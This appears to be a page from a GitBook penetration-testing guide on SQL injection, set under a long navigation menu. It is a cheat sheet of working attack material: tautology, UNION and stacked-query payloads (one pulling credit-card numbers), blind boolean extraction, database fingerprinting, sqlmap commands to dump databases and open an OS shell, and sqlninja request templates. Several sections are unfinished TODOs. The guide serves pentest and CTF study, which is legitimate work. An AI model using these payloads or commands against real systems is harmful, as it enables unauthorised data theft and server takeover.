d4Rk's 1337 h4x0r guide
  • Introduction
  • Reconnaissance
    • Recon
    • OSINT
  • Enumeration
    • Network discovery
    • Port scanning
    • Webserver scanning
    • Exploit detection
    • Fuzzing
    • Process monitoring
  • Exploitation
    • Shells
      • Shells
      • TTY
    • Passwords
      • Hashcat
      • John the Ripper (JTR)
      • Hydra
      • Passwords & credentials
    • Web
      • SQL injection (SQLi)
      • Cross site scripting (XSS)
      • File inclusions (LFI, RFI)
      • Directory traversal
      • Cross site request forgery (CSRF)
      • XML external entity (XXE)
      • Cross origin resource sharing (CORS)
      • Server-side request forgery (SSRF)
      • Server-side template injection (SSTI)
      • Access control vulnerabilities
      • Authentication vulnerabilities
      • JWT attacks
      • File uploads
      • Host header attacks
      • Clickjacking
      • Logic flaws
      • OS command injection
      • HTTP Request smuggling
      • Insecure deserialization
      • DOM-based
      • WebSockets
      • Web cache poisoning
    • Buffer overflow
      • General
      • Linux
      • Windows
    • Misc
      • Evasion
      • SQSH
  • Privilege escalation
    • Linux
      • Overview
    • Windows
      • Overview
      • Mimikatz
      • PowerSploit
      • Juicy Potato, Rotten Potato (NG)
      • JAWS
      • Empire
      • SILENTTRINITY
  • Post exploitation
    • Loot
    • Pivoting
    • Standalone Tools
  • Services
    • TCP
      • TCP 21: FTP
      • TCP 22: SSH
      • TCP 23: Telnet
      • TCP 25, 587: SMTP
      • TCP 53: DNS
      • TCP 80, 443: HTTP(S)
      • TCP 88: Kerberos
      • TCP 110, 995: POP3(S)
      • TCP 111: rpcbind
      • TCP 135: MSRPC
      • TCP 139, 445: NetBIOS, SMB
      • TCP 143, 993: IMAP(S)
      • TCP 389, 636, 3268, 3269: LDAP
      • TCP 1433, UDP 1434: MSSQL Server
      • TCP 2049: NFS
      • TCP 3306: MySQL
      • TCP 3389: RDP
      • TCP 5985: WinRM
      • TCP 6379: Redis
      • TCP 27017: MongoDB
    • UDP
      • UDP 137, 138, TCP 139: NetBIOS
      • UDP 161: SNMP
    • Misc
      • Active Directoy
      • Apache Tomcat
      • Drupal
      • H2 Databases
      • IIS
      • IPsec
      • IRC
      • Java Applets
      • Java RMI
      • Jenkins
      • Joomla
      • Oracle
      • PHP
      • SharePoint
      • WordPress
  • File transfer
    • Overview
    • Wget
    • Pure-FTPd
    • TFTP
    • VBScript: Wget clone
  • Misc
    • Bash
    • Burp Suite
    • Crypto
    • Ebowla
    • Firefox extensions
    • Impacket
    • Memory forensics
    • Metasploit Framework (MSF)
    • MITM
    • Msfvenom
    • Pass the Hash (PTH)
    • PowerShell
    • PowerShell on Linux
    • Wireshark
    • Wordlists and dictionaries
  • Bug Bounty
    • Platforms
    • Tools
Powered by GitBook
On this page
  • General
  • OWASP: WSTG
  • Recon
  • Enum (provoke an error)
  • Injections
  • Fingerprinting
  • information_schema
  • Exploitation
  • Automatic / Tools
  • Evasion
Edit on GitHub
  1. Exploitation
  2. Web

SQL injection (SQLi)

PreviousWebNextCross site scripting (XSS)

Last updated 2 years ago

SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

--

General

OWASP: WSTG

See

Recon

  • Create a list of input fields

Enum (provoke an error)

  • First test ' or ;

  • Comments -- /* */ #

  • Enter different type, e.g. string instead of int

  • Monitor responses (Error may be hidden in JS or HTML)

  • Generic Error (e.g. just 500) -> blind SQL injection

Injections

Classic

  • Most basic 1' or '1' = '1

  • Evade braces and further conditions 1' or '1' = '1'))/*

  • App logic may expect exactly one result 1' or '1' = '1')) LIMIT 1/*

Select

  • http://www.example.com/product.php?id=10 AND 1=2 Error or blank page -> vulnerable

Stacked Queries

  • http://www.example.com/product.php?id=10; INSERT INTO users (…)

Fingerprinting

MySql:

You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near '\'' at line 1

Oracle:

ORA-00933: SQL command not properly ended

MS SQL Server:

Microsoft SQL Native Client error ‘80040e14’
Unclosed quotation mark after the character string

SELECT id, name FROM users WHERE id=1 UNION SELECT 1, @@version limit 1, 1

PostgreSQL:

Query failed: ERROR: syntax error at or near
"’" at character 56 in /www/site/test.php on line 121.

information_schema

The information_schema table contains tables and columns from the database. Their respective names are table_name and column_name inside each table.

Retrieve all the table names:

select group_concat(table_name) from information_schema.tables

Retrieve all the colum names inside from a table.

select group_concat(column_name) from information_schema.columns where table_name = '<tablename>'

Exploitation

Union

1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable
  • Determine number of columns Increase order by number until an error occurs.

http://www.example.com/product.php?id=10 ORDER BY 10--
  • Determine data types of columns Use null as placeholder for yet undetermined columns

http://www.example.com/product.php?id=10 UNION SELECT 1,null,null--
  • Ensure more than one result is shown

http://www.example.com/product.php?id=99999 UNION SELECT 1,1,null--

Boolean

Useful for blind SQL injections

  • Iterate one char at a time

1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1

Error based

TODO

Out of band

TODO

Time delay

TODO

Stored procedure

TODO

Automatic / Tools

  • https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection

  • https://github.com/dtrip/mysqloit

sqlmap

Url formats

GET <host>/index.php?id=1337 POST <host>/index.php --data="id=1337"

Commands

Grab banner?

sqlmap -u <url> -b

Use request (e.g. from burp)

sqlmap -r <file-with-request>

Crawl / enumerate

sqlmap -u <url> --crawl=1

Dump / extract data

sqlmap -u <url> --current-user
sqlmap -u http://<host>/comment.php?id=738 --dbms=mysql --dump -- threads=5

OS shell / get a remote shell

sqlmap -u <url> --os-shell
sqlmap -u http://<host>/comment.php?id=738 --dbms=mysql --os-shell

sqlninja

Test sqlninja

sqlninja -mt -f <config-file>

Set up listener

tcpdump -nnvXSs 0 -c2 icmp

Execute sqlninja

sqlninja -mc -f <config-file>

config files

GET

--httprequest_start-- 
GET <host>/index.php?id=1337;__SQL2INJECT__ HTTP/1.0
Host: <host>
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
Accept-Language: en-us,en;q=0.7,it;q=0.3
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
Connection: close
--httprequest_end--

POST

--httprequest_start-- 
POST <host>/index.php HTTP/1.0
Host: <host>
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
Accept-Language: en-us,en;q=0.7,it;q=0.3
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
Connection: close
id=1337';__SQL2INJECT__
--httprequest_end--

Evasion

  • Whitespaces

  • Null bytes (%00)

  • Inline comments

  • URL encoding

  • Char encoding

  • String concatenation

  • Hex encoding

  • Declare variables

  • Alternative expression of 'or 1=1'

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

Authorization: Basic <hash>

Wikipedia
SQL Injection | pentestmonkey
GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Wordlist | fuzzdb
PortSwigger - SQL injection cheat sheet
OWASP: WSTG
sqlmap: automatic SQL injection and database takeover tool
sqlninja/sqlninja.conf at master · xxgrunge/sqlninja · GitHub